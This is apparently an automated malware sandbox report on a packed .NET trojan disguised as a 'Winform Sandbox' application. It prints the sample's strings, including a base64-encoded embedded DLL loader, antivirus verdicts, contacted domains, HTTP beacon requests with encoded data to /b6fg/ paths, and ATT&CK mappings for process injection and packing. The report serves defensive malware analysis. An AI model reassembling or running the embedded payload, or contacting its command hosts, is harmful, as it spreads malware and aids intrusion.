;Ru'iU
,mz$m
}i/~K
_q_x~9
p?-O'}+
fLh5N
Tpn(B
_\5xe1
@mbJ|0*P
Y1stGK
XQ F6H
D>kMCHOY
j8szi:~
z~uP#j
n. i`
Ldwf0
"M_VJ
VlW)!6
]Tn'[
@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d2VyZWRCeUF0dHJpYnV0ZQBTbWFydEFzc2VtYmx5LkF0dHJpYnV0ZXMAQXR0cmlidXRlAFhBWENBU0QAYzUASU1NTU0AU3lzdGVtLkRyYXdpbmcAQml0bWFwAEIAWEFYQVhBWABtbQB4eABTdGFydEdhbWUAQ1NDU0NWRFdERABFUQBXREZFR0dFR0VHR0UAYwBTQVNBU0ZXRgBCSABWUlZWAEtKAC5jdG9yAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBEZWJ1Z2dpbmdNb2RlcwBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN5c3RlbS5SZWZsZWN0aW9uAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAR3VpZEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEJ5dGUAQnVmZmVyAEJsb2NrQ29weQBBcnJheQBJbWFnZQBnZXRfSGVpZ2h0AEdldFBpeGVsAENvbG9yAEZyb21BcmdiAG9wX0luZXF1YWxpdHkAQXJyYXlMaXN0AFN5c3RlbS5Db2xsZWN0aW9ucwBnZXRfQ291bnQAZ2V0X1IAZ2V0X0cAZ2V0X0IASW5zZXJ0UmFuZ2UASUNvbGxlY3Rpb24AVHlwZQBHZXRUeXBlRnJvbUhhbmRsZQBSdW50aW1lVHlwZUhhbmRsZQBUb0FycmF5AGdldF9XaWR0aABTdHJpbmcA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bwBwAGUAcwAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAAkD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
RSDS`:
C:\Users\Administrator\Desktop\Client\Temp\qpXUooSbAd\src\obj\Debug\KLretdEyph.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
U-5=EMU]dk
Fries
These are some fries
ner Pizza
Turkish Pizza
This is a turkish pizza
Vega Burger
This is a vegetarian hamburger
Double Cheeseburger
This is a double cheeseburger
Grilled Salmon
This is a grilled salmon
cbMenus
label1
Menu:
btnAddMenu
lstOrder
btnClearMenus
Clear
btnRemoveMenu
Remove
label2
Totalprice:
lblTotalPrice
OrderForm
NBvpxSEgawBvbTH
AMD_Isotopes.Processors
StartGame
WinformsSandbox
Form1
Group of Groups!
WinformsSandbox.Properties.Resources
unify4
DataSource
GroupsBindingList
SelectedGroupBindingList
SelectedGroupDataGrid
PersonName
GroupsDataGrid
GroupName
Group Name
Roboto
GroupsView
Groups
{Random Group:
Leonor Halberg
Emil Hardin
Fredda Tardif
Regenia Kearley
Antonietta Batie
Rikki Melnyk
Claire Younger
Mindy Smale
Fredricka Vining
Maribeth Corum
Dagmar Paulson
Ariane Rexroat
Kristyn Drakeford
Susan Debose
Marisol Felter
Lenore Costner
Mitch Tremblay
Madie Penn
Eduardo Gloster
Ardella Bongiorno
Gertude Sherburne
Basilia Leger
Brianna Fleener
Kristian Langlois
Billi Torgerson
Tawnya Berenbaum
Ma Fritze
Lilly Ketchum
Lourie Snook
Brice Spece
Zenia Wilke
Leland Mccaslin
Sanjuanita Slemp
Elwanda Nasser
Melody Cockerham
Roseann Mcgillis
Jesse Sheffield
Lavona Dolloff
Raisa Holst
Regan Schoenberg
Gearldine Pettry
Ilene Mahr
Mitchell Rethman
Britney Riddell
Signe Shuman
Valery Solie
Sherril Portwood
Moshe Lirette
Renata Rael
Jefferey Brendel
Vallie Eidt
Nadia Wine
Neomi Mole
Jannette Gambrell
Tomika Graeber
Ricki Purdom
Martine Tetrault
Dorotha Dashiell
Shaunda Demko
Nereida Chisum
Joy Besaw
Bernardine Winebrenner
Omega Segawa
Patrina Morones
Buddy Sowell
Mahalia Landrum
Fleta Luft
Helen Le
Darlene Borton
Lai Lamont
Winona Lapan
Annie Romero
Samantha Crone
Tamela Weatherwax
Denyse Bosket
Margurite Estabrook
Sebastian Hassell
Joshua Brittingham
Clay Hudspeth
Loriann Burditt
Keshia Poplawski
Karissa Paugh
Annamarie Drees
Tifany Johnosn
Essie Critchfield
Eleanore Bradeen
Deidre Chauez
Santo Limbaugh
Fermina Spinelli
Deonna Higby
Ute Fouts
Joesph Speno
Timothy Fritz
Irene Houze
Brock Lambright
Buffy Claybrooks
Jarod Hofstetter
Holley Mousseau
Bettye Soderberg
Tammera Strebel
Editing
Please, put price in correct format!
Please, fill in all fields!!!
groupBoxButtons
Microsoft Sans Serif
buttonCancel
Cancel
buttonSave
Adding Products:
textBoxSku
labelSku
SKU Number
labelCategory
Category
textBoxCategory
labelTM
Trade Mark
textBoxTM
labelPrName
Product Name
textBoxPrName
labelSupplier
Supplier
textBoxSupplier
labelPrice
Price, UAH
textBoxPrice
labelStoreUn
Storage Unite
textBoxStoreUn
labelProductDetails
Product Details
textBoxProductDetails
AddEditForm
Adding product
Product Editing:
dataGridView1
buttonAdd
Add Product
buttonEdit
Edit Product
button3
Delete Product
groupBox1
buttonExit
EditDeleteAddForm
Products Amending
buttonShow
Show products
buttonAmend
Amend Products
Arial Narrow
labelProducts
Products
labelCatalogue
Catalogue
MainForm
ProductsDirectory.xml
SKU Number =
, Category =
, Trade Mark =
,Product Name =
, Product Details =
, Supplier =
Price = {0}, Storage Unit = {1}
ShowForm
Show Products
NBvpxSEgawBvbTH
unify4
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Winform Sandbox
FileVersion
1.98.4.0
InternalName
KLretdEyph.exe
LegalCopyright
Copyright
2017 - 2020
LegalTrademarks
OriginalFilename
KLretdEyph.exe
ProductName
Winform Sandbox
ProductVersion
1.98.4.0
Assembly Version
1.98.4.0

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean MicroWorld-eScan Clean FireEye Clean
CAT-QuickHeal Clean ALYac Clean Cylance Unsafe
Zillya Clean SUPERAntiSpyware Clean Sangfor Malware
K7AntiVirus Clean Alibaba Clean K7GW Clean
Cybereason Clean Arcabit Clean Invincea Clean
Baidu Clean F-Prot Clean Symantec Clean
TotalDefense Clean APEX Malicious Paloalto generic.ml
ClamAV Clean Kaspersky UDS:DangerousObject.Multi.Generic BitDefender Clean
NANO-Antivirus Clean AegisLab Clean Avast Clean
Tencent Clean Ad-Aware Clean TACHYON Clean
Emsisoft Clean Comodo Clean F-Secure Clean
DrWeb Clean VIPRE Clean TrendMicro Clean
MaxSecure Trojan.Malware.300983.susgen Trapmine Clean CMC Clean
Sophos Clean SentinelOne Clean Cyren W32/MSIL_Troj.WM.gen!Eldorado
Jiangmin Clean Webroot Clean Avira Clean
Fortinet Clean Antiy-AVL Clean Kingsoft Clean
Endgame Clean Microsoft Trojan:Win32/Wacatac.C!ml ViRobot Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic Avast-Mobile Clean Cynet Clean
AhnLab-V3 Clean Acronis Clean McAfee Clean
MAX Clean VBA32 Clean Malwarebytes Trojan.MalPack.ADC
Zoner Clean ESET-NOD32 a variant of MSIL/Kryptik.WPS TrendMicro-HouseCall Clean
Rising Clean Yandex Clean Ikarus Clean
eGambit Clean GData Clean BitDefenderTheta Clean
AVG Clean Panda Clean CrowdStrike Clean
Qihoo-360 Clean
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 50.63.202.41 [VT] United States
N 34.102.136.180 [VT] United States
N 199.192.30.223 [VT] United States
Y 1.1.1.1 [VT] Australia

TCP

Source Source Port Destination Destination Port
192.168.1.3 49195 199.192.30.223 www.magentos.info 80
192.168.1.3 49196 199.192.30.223 www.magentos.info 80
192.168.1.3 49197 34.102.136.180 www.callisterlawgroup.com 80
192.168.1.3 49198 50.63.202.41 www.xinhby.com 80

UDP

Source Source Port Destination Destination Port
192.168.1.2 137 192.168.1.3 137
192.168.1.3 51758 1.1.1.1 53
192.168.1.3 54002 1.1.1.1 53
192.168.1.3 55379 1.1.1.1 53
192.168.1.3 56304 1.1.1.1 53
192.168.1.3 58700 1.1.1.1 53
192.168.1.3 58760 1.1.1.1 53
192.168.1.3 58801 1.1.1.1 53
192.168.1.3 59714 1.1.1.1 53
192.168.1.3 60012 1.1.1.1 53
192.168.1.3 60886 1.1.1.1 53
192.168.1.3 61201 1.1.1.1 53
192.168.1.3 61586 1.1.1.1 53
192.168.1.3 62365 1.1.1.1 53
192.168.1.3 62670 1.1.1.1 53
192.168.1.3 62763 1.1.1.1 53
192.168.1.3 63458 1.1.1.1 53
192.168.1.3 63737 1.1.1.1 53
192.168.1.3 137 192.168.1.255 137
192.168.1.3 55379 8.8.8.8 53
192.168.1.3 56304 8.8.8.8 53
192.168.1.3 58801 8.8.8.8 53
192.168.1.3 59714 8.8.8.8 53
192.168.1.3 61201 8.8.8.8 53
192.168.1.3 62670 8.8.8.8 53
192.168.1.3 62763 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.biblebeater.com [VT] NXDOMAIN
www.296djw.info [VT]
www.belinv.com [VT]
www.magentos.info [VT] A 199.192.30.223 [VT] 199.192.30.223 [VT]
www.callisterlawgroup.com [VT] A 34.102.136.180 [VT] 34.102.136.180 [VT]
www.evntmonitor.com [VT]
www.xinhby.com [VT] A 50.63.202.41 [VT] 50.63.202.40 [VT]
www.thekoulenresidence.com [VT]
www.8800pe.com [VT]
www.quantumpearlpoc.com [VT]
www.venglishhouse.com [VT] 153.127.214.206 [VT]
www.robynhoodofretail.info [VT]
www.mohajrannoor.com [VT]
www.sgknox.com [VT] 104.247.82.10 [VT]
www.descubriendonoruega.com [VT] 88.99.186.213 [VT]

HTTP Requests

URI Data
http://www.magentos.info/b6fg/
POST /b6fg/ HTTP/1.1
Host: www.magentos.info
Connection: close
Content-Length: 162
Cache-Control: no-cache
Origin: http://www.magentos.info
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.magentos.info/b6fg/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

Y2sDANLX=KtBmgHvKKOhxI2(uYkKNu_ScDyONxHnAybYqZhlknErXW_NMyX(sKnwNbKrIQ3AkX3~t4OIcYWP9itfij6(4(8R6lDl2bpFDzPo6lfyqFasfoHAMv2E0UIUsWLJz3F24CptttZis7VMNkvWBGyOTQJA.
http://www.magentos.info/b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP
GET /b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP HTTP/1.1
Host: www.magentos.info
Connection: close

http://www.callisterlawgroup.com/b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H
GET /b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H HTTP/1.1
Host: www.callisterlawgroup.com
Connection: close

http://www.xinhby.com/b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0
GET /b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0 HTTP/1.1
Host: www.xinhby.com
Connection: close

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-30 13:56:02.577 192.168.1.3 [VT] 49180 13.107.42.23 [VT] 443 TCP 1 2028397 2 ET JA3 Hash - Possible Malware - Various Malspam/RigEK Unknown Traffic 3

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-30 13:56:02.686 192.168.1.3 [VT] 49180 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2

Suricata HTTP

Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-30 13:57:09.273 192.168.1.3 [VT] 49195 199.192.30.223 [VT] 80 None www.magentos.info [VT] /b6fg/ None Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko http://www.magentos.info/b6fg/ 0
2020-06-30 13:57:14.787 192.168.1.3 [VT] 49196 199.192.30.223 [VT] 80 None www.magentos.info [VT] /b6fg/?Y2sDANLX=Fv1c+gXtWYBCQk+xHwP156qcIQ+60UnD2N5efydHvXLARdkbiTKxZWIKUbnnbBYJS02k6g==&bj=UTpLQHTh5TvhP None None None 0
2020-06-30 13:57:21.398 192.168.1.3 [VT] 49197 34.102.136.180 [VT] 80 None www.callisterlawgroup.com [VT] /b6fg/?Y2sDANLX=i86svkdPMuoSeDhhFJ4e6n6wN6gQMedHqObOsSeLdahcNU70hhRUteckpwABhiEVdYZs9Q==&bj=UTpLQHTh5TvhP&gi-s=ApXDCv_H None None None 0
2020-06-30 13:57:33.177 192.168.1.3 [VT] 49198 50.63.202.41 [VT] 80 None www.xinhby.com [VT] /b6fg/?Y2sDANLX=DPbGDB5TD6UfGrq05TzqLuMXD+LK6vv4sTGjEb5I8sepxxHDnXsT2ICuKauJmHVONNAp7Q==&bj=UTpLQHTh5TvhP&kUVn=H0HdZlj0 None None None 0
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.3 49180 13.107.42.23 443 3b483d0b34894548b602e8d18cdc24c5 unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.
JSON Report Download
Defense Evasion Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess
  • T1045 - Software Packing
    • Signature - packer_entropy
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 25.571999999999996 seconds )

    • 15.992 NetworkAnalysis
    • 5.342 Suricata
    • 3.093 BehaviorAnalysis
    • 0.421 Static
    • 0.227 CAPE
    • 0.191 VirusTotal
